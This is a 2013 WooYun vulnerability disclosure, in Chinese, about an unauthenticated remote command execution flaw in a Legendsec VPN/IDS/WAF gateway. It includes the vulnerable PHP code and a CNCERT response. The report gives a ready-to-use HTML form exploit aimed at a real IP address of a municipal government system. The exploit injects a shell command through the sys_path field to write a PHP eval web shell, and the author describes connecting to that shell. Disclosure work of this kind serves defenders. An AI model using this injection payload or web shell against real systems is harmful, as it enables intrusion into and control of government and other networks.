漏洞概要
缺陷编号:
WooYun-2013-27324
漏洞标题: [再浅谈内网安全]--网神某带ids,waf网关设备完控0day又一枚
相关厂商:
网神
漏洞作者:
紫梦芊
提交时间: 2013-07-01 11:51
公开时间: 2013-09-29 11:51
漏洞类型: 设计不当
危害等级: 低
自评Rank: 3
漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org
Tags标签:
远程命令执行 硬件安全 VPN IDS WAF
漏洞详情披露状态:
2013-07-01: 细节已通知厂商并且等待厂商处理中
2013-07-05: 厂商已经确认,细节仅向厂商公开
2013-07-08: 细节向第三方安全合作伙伴开放
2013-07-15: 细节向核心白帽子及相关领域专家公开
2013-07-25: 细节向普通白帽子公开
2013-08-14: 细节向实习白帽子公开
2013-09-29: 细节向公众公开
简要描述:
之前发布的国内外VPN网关0day包括了网神 现在再爆他们带ids和waf版本远程命令执行的0day一枚
问题很普通。
详细说明:
话不多说直接上0day.
code 区域<form action="https://221.202.118.50/admin/ids/waf_update.php" method="post">
<input type="hidden" name="uptype" value="1">
<input type="hidden" name="sys_path" value="http://update.cisco.com/tmp.bin -O /data/upload/__ids_up__.bin || echo '<? eval($_POST[cmd])?>' >/ssl/www/bug2.php ||whoami ">
<input type="submit" name="Submit">
</form>
221.202.118.50 是葫芦岛市绩效考核系统 这个应该是网神VPN最新版本 感觉用户体验还不赖
来看看问题出在哪儿
code 区域include_once "management/system.php";
include_once "management/ids.php";
$uptype =1;
if ($_FILES['ids_file'] || isset($_POST["sys_path"])) {
$uptype = $_POST["uptype"];
if($_POST["uptype"] == 2){
$file_size = $_FILES['ids_file']['size'];
$file_type = $_FILES['ids_file']['type'];
$temp_name = $_FILES['ids_file']['tmp_name'];
$file_name = $_FILES['ids_file']['name'];
$file_name = str_replace("\\","",$file_name);
$file_name = str_replace("'","",$file_name);
$file_name = str_replace(" ","",$file_name);
$file_path = $CFG_UPLOAD_PATH."__ids_up__.bin";
//File Name Check
if ( $file_name == "" ) {
echo "Invalid File Name Specified";
return;
}
$result = move_uploaded_file($temp_name, $file_path);
}else{
$file_path = "/data/upload/__ids_up__.bin";
$url = trim($_POST["sys_path"]);
$url ="http://".$url;
system("wget -t 3 $url -O $file_path ");
}
$SM = new IDSManager;
$V = $SM->snort_update($ticket,$file_path);
}
看代码可以看出是能从web上传 也可以从sys_path参数获取到的地址下载 然后进行snort的升级
用system(wget)进行的下载 进行升级钱应该有个ticket判断 这个相当于session或token
还有一要素 management/system.php 和 management/ids.php 是没有在当前目录下的 所以执行0day后出现如此
看到这个Fatal error 很多人瞬间放弃 也许他们测试也测过这里 但是 我们的system在31行之前,无影响(这就是脚本语言的好处之一,运维可以说是噩梦之一,呵呵)
菜刀一连
还有些泄漏的源码 看来应该不大重要 但是不应该放在web目录下
漏洞证明:
https://221.202.118.50/bug2.php cmd
葫芦岛市的用户不少 我在这里抛个砖,引点大家的玉
这个...完全只防了正规途径啊..
这个...依然
这个NAT配置是个很方便的东西 方便对iptables不熟悉的朋友进行内网渗透
PS:其实当前有不少数SOC以及IDS等防御方式不够完善,大多只对正规途径来的用户行为进行了审计防范,一些另类的方式或是不常用的方式并不审计,或审计较弱,还有普遍现象是大量无用信息没有归纳挖掘,网络管理员也懒得看了。
修复方案:
找乌云官方进行乌云众测
(PS:你们竞争对手sinfor也做了众测)
版权声明:转载请注明来源
紫梦芊@
乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:17
确认时间:2013-07-05 00:04
厂商回复:
CNVD确认并复现所述情况,同时对于该设备进行分析后,检测发现若干暴露在互联网上的实例,可以初步确认通用性。拟由CNCERT直接联系厂商处置,同时将继续检测互联网上可能涉及政府和重要信息系统部门的事件,后续加强处置。
rank 17
最新状态:
暂无
原文:http://www.wooyun.org/bugs/wooyun-2013-027324
[
本帖最后由 linda 于 2015-10-28 17:27 编辑 ]